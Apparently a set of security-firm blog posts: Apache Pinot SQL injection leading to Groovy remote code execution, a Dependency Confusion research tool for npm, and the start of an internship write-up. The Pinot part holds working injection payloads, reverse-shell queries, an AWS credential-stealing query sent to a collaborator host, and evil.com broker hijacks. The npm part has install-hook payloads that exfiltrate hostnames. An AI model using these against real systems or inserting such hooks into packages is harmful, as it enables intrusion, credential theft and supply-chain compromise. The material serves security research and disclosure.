SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.
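For example (reusing the transcript table from the examples below):

SELECT studentID FROM transcript WHERE studentID = 200--no space needed before this comment
SELECT /* an inline comment */ firstName FROM transcript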

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to regular expression patterns .* and .

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

  • LIKE '%%%%%%%%%%%%%zz'
  • REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently, it is possible to join against offline tables using the lookUp function.

Subqueries

Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). Hash functions like SHA512, for instance, only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and use it to convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

[Image: "They're the same picture" meme]

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*\([^)]+\)/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!

Note that the error "OPTION statement requires two parts separated by '='" occurs if the wrong number of equals signs appears inside the OPTION().

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability, just as for any other type of database backend: malicious user input must wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).
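For reference, a parameterized query through the Java client might look like the sketch below (based on the pinot-java-client API; the Zookeeper address and table are assumptions, and the quoting happens client-side rather than in Pinot itself):

import org.apache.pinot.client.Connection;
import org.apache.pinot.client.ConnectionFactory;
import org.apache.pinot.client.PreparedStatement;
import org.apache.pinot.client.ResultSetGroup;

public class SafeQuery {
    public static void main(String[] args) {
        String userInput = "O'Brien"; // the single quote is escaped before the query is sent
        Connection conn = ConnectionFactory.fromZookeeper("pinot-zookeeper:2181/pinot");
        PreparedStatement stmt =
            conn.prepareStatement("SELECT order_id FROM orders WHERE product_name = ?");
        stmt.setString(0, userInput); // parameters are 0-indexed
        ResultSetGroup results = stmt.execute();
        System.out.println(results.getResultSet(0).getRowCount());
    }
}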

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

  • store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
  • store_id - store_id = 0 (always true, so all records are returned)
  • (product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This “feature” (a gaping security hole) is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022, but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

  1. The Groovy function is an exception to the earlier rule requiring filters to include a column name.
  2. Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
  3. The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
  4. The return keyword is optional for the final statement, so the script could end with ; 1.

The next query demonstrates passing a column as a Groovy argument, executing a command for every row:
SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

Could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

  • All the segment data stored on the Server
  • Configuration and environment variables with the locations of other services such as Broker and Zookeeper
  • Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables; however, the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.
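For example, from zkCli.sh (a sketch: the JSON is the Broker config above, minified, with HELIX_HOST swapped for an attacker-controlled placeholder):

[zk: pinot-zookeeper:2181(CONNECTED) 2] set /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099 {"id":"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099","simpleFields":{"HELIX_ENABLED":"true","HELIX_ENABLED_TIMESTAMP":"1654547467392","HELIX_HOST":"evil.com","HELIX_PORT":"8099"},"mapFields":{},"listFields":{"TAG_LIST":["DefaultTenant_BROKER"]}}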

A further mitigating factor is that this will not affect services which send requests directly to a hardcoded Broker address. Many clients do, however, rely on Zookeeper or the Controller to locate the Broker, and those clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to a DoS.

Broker

We discovered the location of the Broker. Its HELIX_PORT refers to an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and java versions.
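For example:

$ curl http://pinot-broker-0:8099/appconfigs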

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via GRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper, e.g. to update the Broker host as was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

  • Pinot is a modern database platform that can be attacked with old-school SQLi
  • SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
  • In the official container images, RCE means root on the Server component of the Pinot cluster
  • From here, other components can be affected to a certain degree
  • WTF is going on with OPTION()?
  • Pinot is under active development. Maturity will bring security improvements
  • In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Dependency Confusion

20 July 2022 at 22:00

On Feb 9th, 2022 PortSwigger announced Alex Birsan’s Dependency Confusion as the winner of the Top 10 web hacking techniques of 2021. Over the past year this technique has gained a lot of attention. Despite that, in-depth information about hunting for and mitigating this vulnerability is scarce.

I have always believed the best way to understand something is to get hands-on experience. In the following post, I’ll show the results of my research, which focused on creating an all-around tool (named Confuser) to test and exploit potential Dependency Confusion vulnerabilities in the wild. To validate its effectiveness, we looked for potential Dependency Confusion vulnerabilities in top ElectronJS applications on Github (spoiler: it wasn’t a great idea!).

The tool has helped Doyensec during engagements to ensure that our clients are safe from this threat, and we believe it can facilitate testing for researchers and blue-teams too.

So… what is Dependency Confusion?

Dependency confusion is an attack against the build process of the application. It occurs as a result of a misconfiguration of the private dependency repositories. Vulnerable configurations allow downloading versions of local packages from a main public repository (e.g., registry.npmjs.com for NPM). When a private package is registered only in a local repository, an attacker can upload a malicious package to the main repository with the same name and higher version number. When a victim updates their packages, malicious code will be downloaded and executed on a build or developer machine.
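As a sketch of the flow from the attacker’s side (the package name is borrowed from the example below; the version is illustrative):

$ npm view doyensec-local-library versions   # npm ERR! 404 - the name is unclaimed on the public registry
$ npm publish                                # attacker publishes doyensec-local-library@99.9.9 publicly
# a victim whose registry configuration falls through to the public repository
# then resolves and installs 99.9.9 on its next update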

Why is it so hard to study Dependency Confusion?

There are multiple reasons why, despite all the attention, Dependency Confusion seems to be so unexplored.

There are plenty of dependency management systems

Each programming language utilizes different package management tools, most with their own repositories. Many languages have several of them; JavaScript alone has NPM, Yarn, and Bower, to name a few. Each comes with its own ecosystem of repositories, tooling, and options for local package hosting (or lack thereof). It is a significant time cost to include another repository system when working with projects utilizing different technology stacks.

In my research I have decided to focus on the NPM ecosystem. The main reason for that is its popularity. It’s a leading package management system for JavaScript and my secondary goal was to test ElectronJS applications for this vulnerability. Focusing on NPM would guarantee coverage on most of the target applications.

Actual exploitation requires interaction with 3rd party services

In order to exploit this vulnerability, the researcher needs to upload a malicious package to a public repository. Rightly so, most of them actively work against such practices. On NPM, malicious packages are flagged and removed, and the owner’s account is banned.

During the research, I was interested in observing how much time an attacker has before their payload is removed from the repository. Additionally, NPM is not actually a target of the attack, so among my goals was to minimize the impact on the platform itself and its users.

Reliable information extraction from targets is hard

In the case of a successful exploitation, a target machine is often a build machine inside a victim organization’s network. While it is a great reason why this attack is so dangerous, extracting information from such a network is not always an easy task.

In his original research, Alex proposes a DNS extraction technique to exfiltrate information from attacked machines. This is the technique I decided to use too. It requires a small infrastructure with a custom DNS server, unlike most web exploitation attacks, where an HTTP proxy or a browser is often enough. This highlights why building tools such as mine is essential if the community is to hunt these bugs reliably.
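As a minimal sketch of the idea (the collaborator domain is a placeholder), an NPM install hook can encode host details into a DNS lookup that the custom DNS server then records:

{
  "scripts": {
    "preinstall": "node -e \"const dns=require('dns'),os=require('os');dns.lookup(os.hostname()+'.dns.collab.example',()=>{})\""
  }
}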

The tool

So, how to deal with those problems? I have decided to try and create Confuser - a tool that attempts to solve the aforementioned issues.

The tool is OSS and available at https://github.com/doyensec/confuser.

Be respectful and don’t create problems for our friends at NPM!

The process

Researching any Dependency Confusion vulnerability consists of three steps.

Step 1) Reconnaissance

Finding Dependency Confusion bugs requires a package file that contains a list of application dependencies. In the case of projects utilizing NPM, the package.json file holds such information:

{
  "name": "Doyensec-Example-Project",
  "version": "1.0.0",
  "description": "This is an example package. It uses two dependencies: one is a public one named axios. The other one is a package hosted in a local repository named doyensec-library.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": {
    "axios": "^0.25.0",
    "doyensec-local-library": "~1.0.1",
    "another-doyensec-lib": "~2.3.0"
  }
}

When a researcher finds a package.json file, their first task is to identify potentially vulnerable packages, that is, packages that are not available in the public repository. The process of verifying the existence of a package seems pretty straightforward. Only one HTTP request is required. If the response status code is anything but 200, the package probably does not exist:

import requests

# Base URL of the public NPM site; the exact value is assumed for illustration
NPM_ADDRESS = "https://www.npmjs.com/"

def check_package_exists(package_name):
    response = requests.get(NPM_ADDRESS + "package/" + package_name, allow_redirects=False)

    return (response.status_code == 200)

Simple? Well… almost. NPM also allows scoped package names formatted as follows: @scope-name/package-name. In this case, the package can be a target for Dependency Confusion if an attacker is able to register a scope with the given name. This can also be verified by querying NPM:

def check_scope_exists(package_name):
    split_package_name = package_name.split('/')
    scope_name = split_package_name[0][1:]  # drop the leading "@"
    response = requests.get(NPM_ADDRESS + "~" + scope_name, allow_redirects=False)

    return (response.status_code == 200)

The tool I built streamlines this process. A researcher can upload a package.json file to my web application. In the backend, the file is parsed and its dependencies iterated. As a result, the researcher receives a clear table with potentially vulnerable packages and their versions for a given project:

Vulnerable packages view

The downside of this method is that it requires enumerating the NPM service, with dozens of HTTP requests for each project. In order to ease the strain put on the service, I decided to implement a local cache. Any package name that has once been identified as existing in the NPM registry is saved in the local database and skipped during consecutive scans. Thanks to that, there is no need to repeatedly query the same packages. After scanning about 50 package.json files scraped from GitHub, I estimated that the caching decreased the number of required requests by over 40%.

Step 2) Payload generation and upload

Successful exploitation of a Dependency Confusion vulnerability requires a package that will call home after it has been installed by the victim. In the case of NPM, the easiest way to do this is by exploiting install hooks. NPM packages allow hooks that run each time a given package is installed. Such functionality is the perfect place for a dependency confusion payload to be triggered. The package.json template I used looks like the following:

{
  "name": {package_name},
  "version": {package_version},
  "description": "This package is a proof of concept used by Doyensec LLC to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": { },
  "scripts": {
    "install": "node extract.js {project_id}"
  }
}

Please note the description that informs users and maintainers about the purpose of the package. It is an attempt to distinguish the package from a malicious one, and it serves to inform both NPM and potential victims about the nature of the operation.

The install hook runs the extract.js file, which attempts to extract minimal data about the machine it has been run on:

const https = require('https');
var os = require("os");
var hostname = os.hostname();

const data = new TextEncoder().encode(
  JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
);

const options = {
  hostname: process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}

const req = https.request(options, res => {});
req.write(data);
req.end();

I decided to save time by not implementing a fake DNS server and instead used the existing infrastructure provided by Burp Collaborator. The file uses the given project’s ID and the victim’s hostname as subdomains and tries to send an HTTPS request to the Burp Collaborator domain. This way, my tool is able to assign callbacks to the proper projects along with the victims’ hostnames.

After the payload generation, the package is published to the public NPM repository using the npm command itself: npm publish.

Step 3) Callback aggregation

The final step in the chain is receiving and aggregating the callbacks. As stated before, I decided to use the Burp Collaborator infrastructure. To be able to download callbacks to my backend, I implemented a simple Burp Collaborator client in Python:

import json
import requests

class BurpCollaboratorClient():

    BURP_DOMAIN = "polling.burpcollaborator.net"

    def __init__(self, colabo_key, colabo_subdomain):
        self.colabo_key = colabo_key
        self.colabo_subdomain = colabo_subdomain

    def poll(self):
        params = {"biid": self.colabo_key}
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}

        response = requests.get(
            "https://" + self.BURP_DOMAIN + "/burpresults", params=params, headers=headers)#, proxies=PROXIES, verify=False)

        if response.status_code != 200:
            raise Exception("Failed to poll Burp Collaborator")

        result_parsed = json.loads(response.text)
        return result_parsed.get("responses", [])

After polling, the returned callbacks are parsed and assigned to the proper projects. For example, if anyone runs npm install on the example project shown before, it renders the following callbacks in the application:

Callbacks

Test run

To validate the effectiveness of Confuser, we decided to test Github’s top 50 ElectronJS applications.

I extracted a list of Electron applications from the official ElectronJS repository, available here. Then, I used the GitHub API to sort the repositories by the number of stars and scraped the package.json files of the top 50.

This is the Node script to scrape the files:

// Assumes `octokit` is an initialized Octokit instance and `repos` is the
// list of repositories sorted by stars (both set up earlier in the script).
const fs = require('fs');

for (let i = 0; i < 50 && i < repos.length;) {
    let repo = repos[i]
    await octokit
      .request("GET /repos/" + repo.repo + "/commits?per_page=1", {})
      .then((response) => {
        const sha = response.data[0].sha
        return octokit.request("GET /repos/" + repo.repo + "/git/trees/:sha?recursive=1", {
          "sha": sha
        });
      })
      .then((response) => {
        for (const file_index in response.data.tree) {
          const file = response.data.tree[file_index];
          if (file.path.endsWith("package.json")) {
            return octokit.request("GET /repos/" + repo.repo + "/git/blobs/:sha", {
              "sha": file.sha
            });
          }
        }

        return null;
      })
      .then((response) => {
        if (!response) {
          i++; // no package.json found; skip this repository to avoid looping on it
          return null;
        }
        i++;
        const package_json = Buffer.from(response.data.content, 'base64').toString('utf-8');
        const repoNameSplit = repo.repo.split('/');
        return fs.writeFileSync("package_jsons/" + repoNameSplit[0] + '_' + repoNameSplit[1] + ".json", package_json);
      });
  }

The script takes the newest commit from each repo and then recursively searches its files for any file named package.json. Such files are downloaded and saved locally.

After downloading those files, I uploaded them to the Confuser tool. This resulted in scanning almost 3k dependency packages. Unfortunately, only one application had some potential targets. As it turned out, it was taken from an archived repository, so despite having a “malicious” package in the NPM repository for over 24 hours (after which it was removed by NPM), I received no callbacks from the victim. I did receive a few callbacks from machines that seemed to have downloaded the application for analysis. This also highlighted a problem with my payload: getting only the hostname of the victim might not be enough to distinguish an actual victim from false positives. A more accurate payload might involve collecting information such as local paths and local users, which opens up privacy concerns.

Example false positives: False positives

In hindsight, it was a pretty naive approach to scrape package.json files from public repositories. Open Source projects most likely use only public dependencies and don’t rely on any private infrastructure. On the last day of my research, I downloaded a few closed-source Electron apps. Unpacking them, I was able to extract the package.json file in many cases, but none yielded any interesting results.

Summary

We’re releasing Confuser - a newly created tool to find and test for Dependency Confusion vulnerabilities. It allows scanning package.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.

This research has allowed me to greatly increase my understanding of the nature of this vulnerability and the methods of exploitation. The tool has been sufficiently tested to work well during Doyensec’s engagements. That said, there are still many improvements that can be done in this area:

  • Implement a dedicated DNS server, or at least integrate with Burp’s self-hosted Collaborator server instances

  • Add support for other languages and repositories

Additionally, there seems to be several research opportunities in the realm of Dependency Confusion vulnerabilities:

  • It seems promising to expand the research to closed-source ElectronJS applications. While high profile targets like Microsoft will probably have their bases covered in that regard (also because they were targeted by the original research), there might be many more applications that are still vulnerable

  • Researching other dependency management platforms. The original research touches on NPM, Ruby Gems, Python’s PIP, JFrog and Azure Artifacts. It is very likely that similar problems exist in other environments

My Internship Experience at Doyensec

23 August 2022 at 22:00

Throughout the Summer of 2022, I worked as an intern for Doyensec. I’ll be describing my experience with Doyensec in this blog post so that other potential interns can decide if they would be interested in applying.

The Recruitment Process

The recruitment process began with a non-technical call about the internship to make introductions and exchange more information. Once everyone agreed it was a fit, we scheduled a technical challenge where I was given two hours to provide my responses. I enjoyed the challenge and did not find it to be a waste of time. After the technical challenge, I had two technical interviews with different people (Tony and John). I thought these went really well for questions about web security, but I didn’t know the answers to some questions about other areas of application security I was less familiar with. Since Doyensec performs assessments of non-web applications as well (mobile, desktop, etc.), it made sense that they would ask some questions about non-web topics. After the final call, I was provided with an offer via email.

The Work

As an intern, my time was divided between working on an internal training presentation, conducting research, and performing security assessments. Creating the training presentation allowed me to learn more about a technical topic that will probably be useful for me in the future, whether at Doyensec or not. I used some of my research time to learn about the topic and make the presentation. My presentation was on the advanced features of Semgrep, the open-source static code analysis tool. Doyensec often has cross-training sessions where members of the team demonstrate new tools and techniques, or just the latest “Best Bug” they found on an engagement.

